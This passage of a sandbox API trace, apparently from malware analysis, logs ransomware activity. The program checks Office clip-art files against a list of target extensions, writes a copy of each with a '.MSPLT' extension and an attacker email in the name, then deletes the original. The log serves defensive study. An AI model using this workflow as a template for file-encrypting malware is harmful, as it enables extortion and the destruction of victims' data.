office\\root\\clipart\\pub60cor\\bd19986_.wmf")) returned 1 [0298.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.714] lstrlenW (lpString=".doc") returned 4 [0298.714] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.714] lstrlenW (lpString=".docx") returned 5 [0298.714] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.714] lstrlenW (lpString=".pdf") returned 4 [0298.715] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.715] lstrlenW (lpString=".xls") returned 4 [0298.715] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.715] lstrlenW (lpString=".xlsx") returned 5 [0298.715] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.715] lstrlenW (lpString=".ppt") returned 4 [0298.715] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.715] lstrlenW (lpString=".zip") returned 4 [0298.715] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.715] lstrlenW (lpString=".rar") returned 4 [0298.715] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.715] lstrlenW (lpString=".bz2") returned 4 [0298.715] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.715] lstrlenW (lpString=".7z") returned 3 [0298.715] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.715] lstrlenW (lpString=".dbf") returned 4 [0298.715] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.715] lstrlenW (lpString=".1cd") returned 4 [0298.715] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.715] lstrlenW (lpString=".jpg") returned 4 [0298.715] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.716] lstrlenW (lpString=".doc") returned 4 [0298.716] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.716] lstrlenW (lpString=".docx") returned 5 [0298.716] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.716] lstrlenW (lpString=".pdf") returned 4 [0298.716] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.716] lstrlenW (lpString=".xls") returned 4 [0298.716] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.716] lstrlenW (lpString=".xlsx") returned 5 [0298.716] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.716] lstrlenW (lpString=".ppt") returned 4 [0298.716] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.716] lstrlenW (lpString=".zip") returned 4 [0298.716] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.716] lstrlenW (lpString=".rar") returned 4 [0298.716] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.716] lstrlenW (lpString=".bz2") returned 4 [0298.716] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.716] lstrlenW (lpString=".7z") returned 3 [0298.716] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.716] lstrlenW (lpString=".dbf") returned 4 [0298.716] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.716] lstrlenW (lpString=".1cd") returned 4 [0298.717] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.717] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0298.717] lstrlenW (lpString=".jpg") returned 4 [0298.717] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.718] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.718] lstrlenW (lpString="BL00122_.WMF") returned 12 [0298.718] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0299.350] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=10146) returned 1 [0299.350] CloseHandle (hObject=0x470) returned 1 [0299.350] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf")) returned 0x220 [0299.361] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0299.362] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.362] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0299.365] GetLastError () returned 0x0 [0299.365] ReadFile (in: hFile=0x378, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x27a2, lpOverlapped=0x0) returned 1 [0299.368] WriteFile (in: hFile=0x470, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x27b0, lpOverlapped=0x0) returned 1 [0299.369] ReadFile (in: hFile=0x378, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.369] WriteFile (in: hFile=0x470, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0299.369] SetEndOfFile (hFile=0x470) returned 1 [0299.370] CloseHandle (hObject=0x470) returned 1 [0299.374] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.374] SetEndOfFile (hFile=0x378) returned 1 [0299.377] CloseHandle (hObject=0x378) returned 1 [0299.377] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.378] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00122_.wmf")) returned 1 [0299.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.379] lstrlenW (lpString=".doc") returned 4 [0299.379] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.379] lstrlenW (lpString=".docx") returned 5 [0299.379] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.379] lstrlenW (lpString=".pdf") returned 4 [0299.379] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.379] lstrlenW (lpString=".xls") returned 4 [0299.379] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.379] lstrlenW (lpString=".xlsx") returned 5 [0299.379] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.379] lstrlenW (lpString=".ppt") returned 4 [0299.379] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.379] lstrlenW (lpString=".zip") returned 4 [0299.379] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.379] lstrlenW (lpString=".rar") returned 4 [0299.379] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.379] lstrlenW (lpString=".bz2") returned 4 [0299.379] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.379] lstrlenW (lpString=".7z") returned 3 [0299.379] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.629] lstrlenW (lpString=".dbf") returned 4 [0299.629] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.629] lstrlenW (lpString=".1cd") returned 4 [0299.629] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.630] lstrlenW (lpString=".jpg") returned 4 [0299.630] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.630] lstrlenW (lpString=".doc") returned 4 [0299.630] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.630] lstrlenW (lpString=".docx") returned 5 [0299.630] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.630] lstrlenW (lpString=".pdf") returned 4 [0299.630] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.630] lstrlenW (lpString=".xls") returned 4 [0299.630] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.630] lstrlenW (lpString=".xlsx") returned 5 [0299.630] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.630] lstrlenW (lpString=".ppt") returned 4 [0299.630] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.630] lstrlenW (lpString=".zip") returned 4 [0299.630] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.630] lstrlenW (lpString=".rar") returned 4 [0299.630] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.631] lstrlenW (lpString=".bz2") returned 4 [0299.631] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.631] lstrlenW (lpString=".7z") returned 3 [0299.631] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.631] lstrlenW (lpString=".dbf") returned 4 [0299.631] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.631] lstrlenW (lpString=".1cd") returned 4 [0299.631] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 68 [0299.631] lstrlenW (lpString=".jpg") returned 4 [0299.631] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.631] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.631] lstrlenW (lpString="BL00242_.WMF") returned 12 [0299.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x480 [0300.354] GetFileSizeEx (in: hFile=0x480, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=4024) returned 1 [0300.354] CloseHandle (hObject=0x480) returned 1 [0300.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf")) returned 0x220 [0300.676] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0300.858] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c0 [0301.005] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0301.005] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0301.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f8 [0303.436] GetLastError () returned 0x0 [0303.436] ReadFile (in: hFile=0x4c0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xfb8, lpOverlapped=0x0) returned 1 [0303.438] WriteFile (in: hFile=0x4f8, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xfc0, lpOverlapped=0x0) returned 1 [0303.440] ReadFile (in: hFile=0x4c0, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0303.440] WriteFile (in: hFile=0x4f8, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0303.440] SetEndOfFile (hFile=0x4f8) returned 1 [0303.441] CloseHandle (hObject=0x4f8) returned 1 [0303.450] SetFilePointerEx (in: hFile=0x4c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0303.450] SetEndOfFile (hFile=0x4c0) returned 1 [0303.460] CloseHandle (hObject=0x4c0) returned 1 [0303.461] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0303.462] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00242_.wmf")) returned 1 [0303.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.463] lstrlenW (lpString=".doc") returned 4 [0303.463] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0303.463] lstrlenW (lpString=".docx") returned 5 [0303.468] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0303.468] lstrlenW (lpString=".pdf") returned 4 [0303.468] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0303.468] lstrlenW (lpString=".xls") returned 4 [0303.468] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0303.468] lstrlenW (lpString=".xlsx") returned 5 [0303.468] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0303.468] lstrlenW (lpString=".ppt") returned 4 [0303.468] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0303.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.468] lstrlenW (lpString=".zip") returned 4 [0303.468] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0303.468] lstrlenW (lpString=".rar") returned 4 [0303.468] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0303.468] lstrlenW (lpString=".bz2") returned 4 [0303.468] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0303.468] lstrlenW (lpString=".7z") returned 3 [0303.468] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0303.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.469] lstrlenW (lpString=".dbf") returned 4 [0303.469] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0303.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.778] lstrlenW (lpString=".1cd") returned 4 [0303.778] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0303.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.778] lstrlenW (lpString=".jpg") returned 4 [0303.778] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0303.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.809] lstrlenW (lpString=".doc") returned 4 [0303.810] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0303.810] lstrlenW (lpString=".docx") returned 5 [0303.810] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0303.810] lstrlenW (lpString=".pdf") returned 4 [0303.810] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0303.810] lstrlenW (lpString=".xls") returned 4 [0303.810] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0303.810] lstrlenW (lpString=".xlsx") returned 5 [0303.810] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0303.810] lstrlenW (lpString=".ppt") returned 4 [0303.810] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0303.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.810] lstrlenW (lpString=".zip") returned 4 [0303.810] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0303.810] lstrlenW (lpString=".rar") returned 4 [0303.810] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0303.810] lstrlenW (lpString=".bz2") returned 4 [0303.810] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0303.810] lstrlenW (lpString=".7z") returned 3 [0303.810] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0303.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.810] lstrlenW (lpString=".dbf") returned 4 [0303.810] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0303.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.810] lstrlenW (lpString=".1cd") returned 4 [0303.810] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0303.810] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00242_.WMF") returned 68 [0303.810] lstrlenW (lpString=".jpg") returned 4 [0303.810] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0303.811] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0303.811] lstrlenW (lpString="BL00273_.WMF") returned 12 [0303.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0305.463] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=3780) returned 1 [0305.470] CloseHandle (hObject=0x3e4) returned 1 [0305.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf")) returned 0x220 [0306.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0308.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0308.216] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.216] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0308.795] GetLastError () returned 0x0 [0308.795] ReadFile (in: hFile=0x52c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xec4, lpOverlapped=0x0) returned 1 [0308.798] WriteFile (in: hFile=0x3e4, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xed0, lpOverlapped=0x0) returned 1 [0308.800] ReadFile (in: hFile=0x52c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0308.800] WriteFile (in: hFile=0x3e4, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0308.800] SetEndOfFile (hFile=0x3e4) returned 1 [0308.800] CloseHandle (hObject=0x3e4) returned 1 [0308.802] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0308.802] SetEndOfFile (hFile=0x52c) returned 1 [0308.806] CloseHandle (hObject=0x52c) returned 1 [0308.806] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0309.743] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00273_.wmf")) returned 1 [0309.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.745] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 68 [0309.745] lstrlenW (lpString=".doc") returned 4 [0309.745] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 